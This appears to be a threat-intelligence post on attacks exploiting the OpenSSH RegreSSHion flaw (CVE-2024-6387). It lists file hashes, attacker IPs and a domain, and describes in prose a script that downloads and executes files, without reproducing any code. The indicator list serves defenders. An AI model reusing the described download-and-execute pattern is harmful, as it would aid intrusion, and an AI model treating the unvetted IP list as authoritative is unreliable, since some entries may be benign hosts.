📌OpenSSH does have a vulnerability which is being exploited
📌Found few malicious scripts/files that are involved in the attack
💡GO Agent detected which is used in CHAOS RAT Project
Bash Script used in RegreSSHion
=====================
📌The script begins by downloading 12 files from a remote server, each with a different file extension.
📌It then changes the permissions of each downloaded file to make them executable.
📌Finally, it executes each downloaded file.
📌The script does not perform any checks on the downloaded files before executing them, which could allow malicious files to be executed.
📌Here are the list of malicious scripts/files which are found along with CVE-2024-6387 RegreSSHion Vulnerability:-
1f452448cea986aedc88ba50d48691f7
f88f1c803432b72243da85089264bc92
41fc3137fe26d26f72c7d6c48dae8f36
c2e368e608090479ceb4bc9ce6e45081
f1605ee67da4359d523697d61e380d69
f01b45a5bea298b837db3af8c5bad744
35baf8244b9e96bae7a9a97df0c61188
2be087e54204a6c395e05516c53fd579
639b0503927108085f2a03de0383da5f
536b6c9024361ab349363a6a55c2a2b8
0df799f05c6d97e2b7d4b26c8e7246f7
11cc5f00b466d4f9be4e0a46f2eb51ae
207eb58423234306edaecb3ec89935d8
0df799f05c6d97e2b7d4b26c8e7246f7
34dbec1fdbd5eb161788b3ddab78d914
📌All these files are initially spotted on 2nd July 2024.
☢️High Confidence IOC
================
📍209.141.53.247 🇺🇸
📍195.85.205.47 🇹🇷
📍62.72.191.203 🇹🇷
📍botbot.ddosvps.cc
💡This is used by Agent Tesla previously.
💡Use to carried out Apache Log4j RCE Attack.
Avg. Confidence IP
============
108.174.58.28
34.243.160.129
34.254.182.186
54.171.230.55
54.217.10.153
54.247.62.1
109.202.202.202
91.189.91.43
91.189.91.42
💡Most of the IPs observed for the malicious files are already a part of Botnets such as Mirai, Gafgyt and Okiru.
#OpenSSH #infosec #exploit #SSH #Regresshion #threatintelligence #threatintel #security #OSINT #vulnerability #hack #cybersecurity